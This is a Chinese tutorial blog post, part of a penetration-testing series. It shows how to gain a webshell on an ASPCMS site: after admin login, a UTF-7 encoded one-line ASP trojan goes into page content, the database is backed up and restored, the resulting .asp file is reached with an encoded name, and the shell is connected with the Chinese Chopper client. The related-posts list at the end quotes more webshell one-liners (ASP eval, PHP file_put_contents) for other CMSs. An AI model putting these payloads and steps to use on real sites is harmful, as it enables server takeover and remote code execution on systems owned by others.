Aspcms框架的webshell
文章目录
- 渗透测试-地基篇-Webshell-Aspcms框架(十)
- 一、登录演示
- 二、数据库备份拿webshell
一、登录演示
本次演示一种方法思路拿aspcms框架的webshell,该页面是用的是最新版本的aspcms框架自行搭建演示的。
1)登录地址:http://www.aspcms.com/admin_aspcms/
2)登录后的页面:
二、数据库备份拿webshell
登录到扩展功能-数据库备份恢复:
首先打开内容维护中栏目都可以插入一句话,修改即可:
插入utf7一句话:
uft7 一句话┼攠數畣整爠煥敵瑳∨≡┩愾
然后开始备份数据库:
在点击恢复此备份:
aspcms默认的这个数据库名是:#5Dp8Gh.asp改为%235Dp8Gh.asp
访问:http://www.aspcms.com/data/%235Dp8Gh.asp
在内容中出现:ÀàÐͲ»Æ¥Åä: 'execute’表示写入一句话
成功利用caidao连接:
Aspcms框架的webshell相关推荐
- PHPcms框架的Webshell
登录界面 后台网址 www.phpcms.com/admin.php 进入主页面 代码注入拿webshell 接下来 我直接就上图了 写入一句话木马 <?php file_put_content ...
- 织梦dedecms的框架的Webshell
一.后台 后台登录 http://www.dedecms.com/dede 后台界面 二.Webshell方法 1:文件上传 蚁剑进行连接 成功 2:新建一句话文件 蚁剑连接 3:html修改 打开模 ...
- xyCMS框架的webshell
"%><%eval request("d")%><%s=" 在网站配置页面插入一句话.(注意一定要把前后内容闭合,不然整个网站都要崩溃) ...
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
- Burp Collaborator 使用总结
0x00:使用原因 我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS ...
- BBScan:信息泄漏批量扫描脚本
有些朋友手上有几十万甚至上百万个域名,如果把这些域名全部扔给wvs. APPscan这样的重型扫描器,显然是不太合适的. 对于一个拥有上万IP的企业,又如何快速定位可能存在弱点的机器呢? 试试信息泄漏 ...
- jexboss工具 -- JBOSS未授权访问漏洞利用
其实所有的节日,都不是为了礼物和红包而生,而是提醒我们不要忘记爱与被爱,生活需要仪式感,而你需要的是在乎和关爱... ---- 网易云热评 小受:Ubuntu20 小攻:Kali2020 一.搭建该 ...
- 逍遥模拟器配置burpsuite抓包环境
电脑与逍遥模拟器处于同一网段,在burpsuite中设置代理: 之后在逍遥模拟器中设置网络代理 之后直接下载下面的证书并且将其拖放到逍遥模拟器中: 证书下载地址: 链接:https://pan.bai ...
- BurpSuite v2021.8.2安装使用
文章前言 几个月之前,Burpsuit官方发布了BurpSuite v2021.8.2,但是迟迟没有时间来试试手,正好借着这次调休的时间来写写文章,顺便更新一下Burpsuite 软件下载 天翼云盘 ...
最新文章
- C语言语句单选题,C语言练习题
- python编程基础与应用-Python编程基础与应用
- 石川es6课程---3、变量let和常量const
- Python网络数据采集
- redis 启动_Redis介绍amp;安装amp;启动
- [C++基金会]位计算 游戏开发中的应用
- [SDOI2016] 生成魔咒(后缀数组SA + st表 + set)动态不同子串个数
- http 请求头 header Referer 含义和作用
- 图像处理------图像细化
- CMake中的ARGC ARGV 和ARGN参数意义
- 论有一个服务器后可以干什么
- OpenGL基础42:实例化
- dede 鼠标移到标题处显示完整标题
- 这几个刺激的公众号 能让你怀疑人生
- # 20145205 《Java程序设计》第1周学习总结
- 【跃迁之路】【648天】程序员高效学习方法论探索系列(实验阶段405-2018.11.21)...
- DPDK示例l3fwd性能测试
- 风尚云网学习篇-介绍chrome 浏览器的几个版本
- Segment routing分段路由
- labelme标记图像时JSON标签复制
热门文章
- 怎么讲服务器上的文件装进电脑,怎么把电脑文件放进云服务器
- 单片机float数发给上位机_上位机倒计时器
- python登录页面_Python:简单的登陆GUI界面
- python中什么叫合法的标识_python合法标识符要求是什么
- 实现任意行数的杨辉三角
- python用psf函数_python学习之-类的内置函数
- 真实收货地址大全2016_中国古典诗词大全汇集了诗经、唐诗、宋词、元曲以及纳兰词,12册精美套装。...
- c语言实现二分法_C语言实现二分法求解方程在区间内的根
- Mongodb 分片与副本集
- linux bash tutorial